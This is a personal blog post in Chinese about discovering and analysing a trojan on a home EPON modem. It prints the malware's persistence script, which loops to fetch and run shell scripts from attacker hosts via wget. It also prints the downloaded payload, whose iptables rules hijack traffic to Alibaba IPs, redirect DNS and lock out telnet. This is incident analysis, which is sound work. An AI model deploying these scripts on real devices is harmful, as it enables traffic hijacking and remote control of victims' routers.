EPON终端被黑记（RG200O-CA)

xzhower

最近发现家里上网特别慢，经常打不开网页，排查两天发现是家里EPON的Modem（型号RG200O-CA）被黑了。


telnet进入Modem，检查系统文件，突然telnet中断，无法再telnet。断电重启，可以telnet进去，过一会儿还是telnet会中断。遂断开光纤，此时telnet正常，不再发生中断现象，初步判断telnet中断现象与上网状态有关。怀疑是Modem被木马感染。反复PS检查当前进程信息，突然发现一行可疑信息：

...... wget -q -P /tmp http://koudaiba.sinaapp.com start.sh ......

此前因为仔细研究过这台Modem，开启了路由功能，并成功编译上传了一个打印服务器的程序，对这个Modem的系统比较了解，从未出现过这样的信息，因此可以断定确实是Modem受到了感染。
经过搜索，上面的那行命令是通过/home/sh.sh启动的，查看/home/sh.sh内容如下：

# cd /home # ls sh.sh # ls -l -rw-r--r--    1 admin    root          466 Nov 23 07:26 sh.sh # cat sh.sh #!/bin/sh while true do sleep 100 wget -q -P /tmp http://59.56.68.183:20011/start.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/start.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/start.sh && sh /tmp/start.sh && while true do wget -q -P /tmp http://59.56.68.183:20012/while.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/while.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/while.sh || sleep 43200 && sh /tmp/while.sh || sleep 43200 done done

可以看到木马程序从两个网站下载shell脚本并反复循环实行，好吧，我也下载下来看看里面什么东东

#!/bin/sh for ip in"140.205.140.188" "110.75.96.102" "106.39.164.154" "140.205.142.214" "140.205.135.67" "140.205.164.96" "140.205.250.86" "110.75.206.8" "140.205.140.76" "140.205.32.93" "140.205.243.65" "140.205.170.51" "140.205.134.199" "140.205.230.37" "140.205.250.42" "110.75.96.109";do iptables -t nat -D PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002 iptables -t nat -I PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002 done for ip in"120.24.0.0/14" "121.40.0.0/14" "119.28.0.0/15" "203.195.128.0/17" "115.28.0.0/15" "114.215.0.0/16" "120.55.0.0/16";do iptables -t nat -D PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114 iptables -t nat -I PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114 done iptables -D INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROP iptables -I INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROP sleep 86400

看到一串IP地址，后面又设置了防火墙规则。最后面的两条太显眼，就是只允许指定的网段能够telnet控制我的Modem，我之前的telnet中断现象就是它干的。
前面两条规则是把对上面那些IP TCP 80端口的访问数据全部转发到了59.56.68.183的20002端口；
中间的两条规则是把对中间那段IP地址段的DNS访问全部转发到了114.114.114.114貌似这没有太大的危害。
那就再来看看一开始的哪些IP地址是谁的吧，随便找个IP地址试试：

C:\>telnet 140.205.140.188 80 HTTP/1.1 302 Found Server: Tengine Date: Sat, 26 Dec 2015 15:04:00 GMT Content-Type: text/html Content-Length: 258 Connection: close Location: http://www.******.com/ Via: ad052071.et2[web,302] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head><title>302 Found</title></head> <body bgcolor="white"> <h1>302 Found</h1> <p>The requested resource resides temporarily under a different URI.</p> <hr/>Powered by Tengine</body> </html>

乖乖，居然是淘宝的IP，原来这个木马劫持了淘宝的IP，受害的用户不知不觉就连到了木马控制人的服务器上，真是吓死宝宝了。到百度一搜，那些IP地址大都是alibaba的。
而木马控制人的服务器IP59.56.68.183是福建某地的。

回头再来看看木马程序是如何启动的，查到/etc/有个rc_vtp2.0
-r-xr-xr-x    1 admin    root          545 Nov 23 07:26 rc_vtp2.0
看看它的内容：

# cat rc_vtp2.0 #!/bin/sh mkdir /var/tmp/tftp mkdir /var/config mkdir /var/ctc mkdir /var/net-snmp mkdir /var/syslog /usr/sbin/lightbox # enhanced the logic unix/inet socket buffer and backlog echo -n "max_dgram_qlen is changed from " cat /proc/sys/net/unix/max_dgram_qlen > /dev/console echo 100 > /proc/sys/net/unix/max_dgram_qlen echo -n "to " cat /proc/sys/net/unix/max_dgram_qlen > /dev/console echo -n "change the socket recv buffer uplimit to 512k" echo "524288" > /proc/sys/net/core/rmem_max sleep 1 cm_logic& sleep 1 syslogd & sh /home/sh.sh&

在最后多了一句，之前的内容可能是原来就有的。
再看看rc_vtp2.0是在哪儿启动的，只在/etc/profile中有一句

...... /etc/rc_vtp2.0 ......

这就奇怪了，按理/etc/profile只有在有人登录之后才会实行，是不是还有另外的地方启动呢？


先赶紧把这些木马文件干掉，回头继续查。

2015.12.26 23:19